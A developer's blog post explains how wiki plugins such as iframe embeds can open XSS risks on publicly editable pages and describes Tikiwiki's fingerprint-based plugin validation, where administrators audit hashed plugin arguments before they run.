Security in the wild

Wikis are open in nature and it’s what brought them to success. Anyone can visit the page, edit it and see the changes live. The concept is really simple and became natural very fast. It’s all around. However, wiki applications evolved over time. The average wiki no longer is just text editable by anyone. They became the heart of complete content management systems with access rights and many other features. Wiki purists cringe when they hear of a wiki that is not editable by anyone. The corporate world does the same when they hear that their intranet could be modified by any employee.

In a standard wiki. The worst thing that can happen is that someone can get offended by false information (or simply offending spam). Undo last change. The world goes on.

As wikis evolved, usage called for higher level functionality. Pages are no longer only textual information, they tend to become full blown applications. They can generate dynamic lists and interact with external systems. This is done mostly though a syntax extension often called a plugin. The concept is very simple. A unified syntax contains a name and some arguments. When the parser runs into it, it calls a custom function and displays the result. In most cases, these will perform harmless operations and cannot cause any damage. All they do is display text, only text a little more complex.

The problem is that they can be used for a whole lot of things, and harmless really is context dependant. Consider a situation where content must be displayed from an other web application, probably a legacy intranet application. One way to do it is to get the server to fetch the HTML page, filter out some of the tags so it fits nicely in the page and display it. This technique is very vulnerable to content format changes and is quite hard to configure for normal people. An easier way would be to use an iframe and just load the page from whereever it is.

In a corporate setting, this probably works great because you can trust the people you work with not to screw up and load something they shouldn’t on the intranet’s home page.

If you want to use it on a public website where all edit rights are restricted, everything is fine. However, if you have a single page that allows public edit, you just opened up a very wide security gap that could allow sub-script-kiddy (talking about the kind of people who “hack” pages on wikipedia) to hijack sessions through XSS.

The main issue is that these extensions are installed or not. You could use it at some point in a completely safe environment, stop using it, and then change the context which made it safe. The extension is still active and you forgot about it. It’s installed site-wide. There is no way to enable it just on specific pages that are controlled. Because the plugin instantiation is part of the page’s content, you can’t prevent anyone with edit rights on a page from using it.

In implementing remote plugins, this was a major issue. Not only it was a plugin that can potentially do harm, it’s about plugins I don’t even know about. I had this vague idea of requiring input validation on the remote plugins before letting them run, so not anything could be called unless an administrator granted permission. All of it was fairly complicated because of implementation issues. During a discussion on IRC with sylvieg and ricks99, I realized that the problem existed beyond the remote service problem. So far, I had really considered if the context wasn’t safe, some extensions should not be installed. Rick was asking if there was a way to let admins add a plugin, but not anyone else. This got me to realize that the only reason it was hard to implement is that I was taking the problem from the wrong level. Applying the validation at the plugin-wide level made it much easier to deal with than if I did it specifically for the remote ones. It also added a whole lot more value too.

The final implementation is very simple in the end. When an extension can be dangerous, it declares it as part of the definition by identifying which parts require validation (body, arguments or both). When the wiki parser encounters a plugin that requires validation, it generates a fingerprint of the plugin and verify if that fingerprint is known. If it is, it goes on, otherwise it displays controls on the page for authorized users to perform the audits (non-authorized ones get an error message). The fingerprint is nothing more than the name of the plugin, a hash of the serialized arguments, a hash of the body and the size of both input to avoid collisions. Some arguments marked as safe can be excluded from the hash to allow some flexibility.

The end result is that any plugin can be enabled on any host in any context and the site’s users are still safe from XSS attacks. More capabilities for the public/open wikis. Of course, because of Tikiwiki policies, validation can be disabled, which is useful if you have one of those safe context.

It does have a downside thought. Validation is required when changes are made to the plugin, which means the page is not fully enabled until an auditor visited it, which may take some time. Notifications, tracking, … There are solutions, but viewing the changes is no longer possible as soon as you click save. The white list verification is a pessimistic approach to the problem, but it’s still better than letting a few identities be stolen until it’s caught.

The implementation is available in tikiwiki svn and will be released as part of 3.0 in April 2009.

Leave a Reply

Your email address will not be published. Required fields are marked *